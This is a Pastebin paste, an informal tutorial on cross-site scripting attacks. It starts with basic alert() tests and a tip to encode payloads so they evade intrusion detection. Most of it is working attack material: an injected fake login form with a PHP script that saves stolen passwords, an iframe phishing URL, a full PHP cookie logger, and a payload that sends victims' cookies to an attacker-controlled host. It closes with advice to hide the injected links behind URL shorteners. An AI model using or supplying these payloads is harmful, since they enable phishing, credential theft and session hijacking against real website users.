Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hey today we're going to talk about XSS(cross site scripting)
- We are talking about common xss attack types:
- Injectable by URL -client side
- Injectable by field forms -client side
- It depends if we can execute PHP or HTML, if we can inject PHP then we can also
- inject HTML but NOT vice versa)
- To find a XSS vulnerability the automatic way you can use:
- https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework
- To test it out manual you like:
- <script>alert"xss"</script>
- That will pop-up a window shouting xss on client site(just your browser)
- For bypassing ids,ips you can encode it in hex etc.
- Or do things like:
- '> <*script>alert("xss")<*/script>
- But this manual shit is boring so lets talk about some more interesting things.
- XSS PHISHING :DD
- All we do is grab a vuln popular url and add xss script to it, send it to victim as embedded link
- Like this
- www.site.com/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
- <div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.com/phishingscript.php">
- Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
- <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
- <br /></form></div></body></html>
- you haft to own the "http://www.phishingsite.com/phishingscript.php" ofc
- content of phishingscript.php
- <?php
- $login = $_POST['user'];
- $password = $_POST['Password'];
- $open = fopen('log.txt', 'a+');
- fputs($open, 'Username : ' . $login . '<br >' . '
- Password : ' . $password . '<br >' . '<br >');
- ?>
- or maybe Iframe phishing be like:
- www.site.com/google.php?search=<iframe src="http://www.yourphishingsite.com" height="100%" width="100%"></iframe>
- Enough with phishing, lets now talk about
- Cookie hijacking:
- Put cookie logger script on your webpage and insert it to javascript into xss vulnerable with the cookielogger script address :)
- The rest will script handle
- cookielogger.php
- <*?php
- function GetIP()
- {
- if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
- $ip = getenv("HTTP_CLIENT_IP");
- else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
- $ip = getenv("HTTP_X_FORWARDED_FOR");
- else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
- $ip = getenv("REMOTE_ADDR");
- else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
- $ip = $_SERVER['REMOTE_ADDR'];
- else
- $ip = "unknown";
- return($ip);
- }
- function logData()
- {
- $ipLog="log.txt";
- $cookie = $_SERVER['QUERY_STRING'];
- $register_globals = (bool) ini_get('register_gobals');
- if ($register_globals) $ip = getenv('REMOTE_ADDR');
- else $ip = GetIP();
- $rem_port = $_SERVER['REMOTE_PORT'];
- $user_agent = $_SERVER['HTTP_USER_AGENT'];
- $rqst_method = $_SERVER['METHOD'];
- $rem_host = $_SERVER['REMOTE_HOST'];
- $referer = $_SERVER['HTTP_REFERER'];
- $date=date ("l dS of F Y h:i:s A");
- $log=fopen("$ipLog", "a+");
- if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
- fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
- ");
- else
- fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
- fclose($log);
- }
- logData();
- ?>
- Make a tlog.txt and put both of them on your webspace and set "chmod 777".
- Inject the following code in your target website:
- http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
- you vuln script be like ofc <script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
- use url shortener services such as tinyurl.com or bit.ly to 'hide' your injection script from the victim
- information and code from 2011
Add Comment
Please, Sign In to add comment